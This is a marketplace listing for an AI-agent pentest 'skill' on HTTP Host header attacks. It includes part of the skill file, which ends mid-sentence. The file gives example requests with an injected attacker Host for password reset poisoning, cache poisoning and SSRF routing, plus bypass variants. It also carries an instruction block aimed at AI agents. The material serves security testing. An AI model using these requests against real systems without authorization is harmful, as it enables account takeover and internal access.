Http Host Header Attacks
Test and exploit Host-header trust in web apps for reset poisoning, cache abuse, SSRF routing, and vhost bypass during security review.
Overview
HTTP Host Header Attacks is an agent skill for the Ship phase that guides Host-header injection for password reset poisoning, cache poisoning, SSRF via routing, and virtual host bypass.
Install
npx skills add https://github.com/yaklang/hack-skills --skill http-host-header-attacksWhat is this skill?
- Password reset poisoning and URL generation abuse via trusted Host
- Web cache poisoning and virtual host bypass patterns
- SSRF and internal routing when the Host header steers backends
- Bypass patterns for Host validation and framework-specific behaviors
- Explicit cross-links to cache deception, SSRF, smuggling, and WAF bypass skills
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
Your app or proxy trusts the Host header for URLs or routing, and you need a systematic test plan for poisoning and bypass—not a single remembered payload.
Who is it for?
Authorized pentests and pre-launch reviews of multi-tenant SaaS, PHP/Laravel-style apps, and CDN-fronted APIs with custom Host handling.
Skip if: Teams with no HTTP surface, or anyone testing production systems without permission.
When should I use this skill?
Use when the application trusts the Host header for generating URLs, routing requests, or access control—enabling password reset poisoning, web cache poisoning, SSRF via routing, and virtual host bypass.
What do I get? / Deliverables
You follow a structured attack-surface and bypass checklist and can chain into linked skills when Host abuse enables cache, SSRF, or smuggling follow-ons.
- Documented Host injection test cases and observed framework behavior
- Findings report with chain paths to cache, SSRF, or redirect impact
Recommended Skills
Journey fit
Host-header abuse is exercised during Ship when hardening or pentesting URL generation, reverse proxies, and routing before production exposure. Security subphase is the canonical home for injection and routing abuse playbooks against live HTTP stacks.
How it compares
Procedural web-appsec skill package, not an automated scanner or MCP server.
Common Questions / FAQ
Who is http-host-header-attacks for?
Indie and solo builders shipping web apps who run their own security passes or bug-bounty-style checks on Host-dependent routing and URL builders.
When should I use http-host-header-attacks?
During Ship security when reset links, canonical URLs, cache keys, or reverse-proxy vhosts read Host; also when investigating suspected cache or SSRF issues tied to Host.
Is http-host-header-attacks safe to install?
The skill teaches offensive patterns; check Security Audits on this page and restrict use to environments you own or are contracted to test.
SKILL.md
READMESKILL.md - Http Host Header Attacks
# SKILL: HTTP Host Header Attacks — Injection & Routing Abuse > **AI LOAD INSTRUCTION**: Covers Host header injection for password reset poisoning, cache poisoning, SSRF via routing, and virtual host bypass. Includes bypass techniques for Host validation and framework-specific behaviors. Base models often miss the double-Host trick, absolute-URI override, and connection-state attacks. ## 0. RELATED ROUTING - [web-cache-deception](../web-cache-deception/SKILL.md) when Host injection is combined with cache behavior - [ssrf-server-side-request-forgery](../ssrf-server-side-request-forgery/SKILL.md) when Host header routes requests to internal services - [open-redirect](../open-redirect/SKILL.md) when Host injection causes redirect to attacker domain - [waf-bypass-techniques](../waf-bypass-techniques/SKILL.md) when Host manipulation helps bypass WAF routing - [request-smuggling](../request-smuggling/SKILL.md) when smuggling enables Host header manipulation past front-end validation - [subdomain-takeover](../subdomain-takeover/SKILL.md) when Host routing exposes internal vhosts resolvable via subdomain --- ## 1. ATTACK SURFACE The Host header is used by web applications and infrastructure for: | Usage | Exploitation | |---|---| | URL generation (password reset links, email links) | Inject attacker domain → user clicks link to attacker | | Virtual host routing | Spoof Host → access internal/admin vhost | | Cache key component | Inject different Host → poison cache for all users | | Reverse proxy routing | Host determines backend → SSRF to internal services | | Access control decisions | Host-based ACLs can be bypassed | | Canonical URL / SEO redirects | Host injection → open redirect | --- ## 2. PASSWORD RESET POISONING The most common and impactful Host header attack. ### How It Works ``` 1. Attacker requests password reset for victim@target.com 2. Attacker modifies Host header in the reset request: POST /forgot-password HTTP/1.1 Host: attacker.com ← injected email=victim@target.com 3. Server generates reset link using Host header value: "Click here to reset: https://attacker.com/reset?token=SECRET_TOKEN" 4. Victim receives email, clicks link → token sent to attacker 5. Attacker uses token on real target.com to reset password ``` ### Testing ```http POST /forgot-password HTTP/1.1 Host: attacker-collaborator.burpcollaborator.net Content-Type: application/x-www-form-urlencoded email=victim@target.com ``` Check Burp Collaborator for incoming HTTP request with the reset token. ### Variants - Some apps concatenate: `Host: target.com.attacker.com` → link becomes `https://target.com.attacker.com/reset?token=xxx` - Some apps use only the port portion: `Host: target.com:@attacker.com` → parsed as `attacker.com` in some URL parsers --- ## 3. WEB CACHE POISONING VIA HOST ``` 1. Attacker sends: GET / HTTP/1.1 Host: attacker.com 2. If cache keys on URL path but NOT on Host header: → Response cached with attacker.com in generated links/content 3. Subsequent users requesting GET / receive the poisoned response → Links point to attacker.com, scripts load from attacker.com ``` **Key requirement**: Cache must not include Host header in cache key, but application must use Host in response body. Test by sending two requests with different Host values and checking if the second request returns the first's Host in the response. --- ## 4. SSRF VIA HOST ROUTING When a reverse proxy uses Host header to route to backends: ``` GET /api/internal HTTP/1.1 Host: internal-admin-panel.local → Reverse proxy routes request to internal-admin-panel.local → Attacker accesses internal serv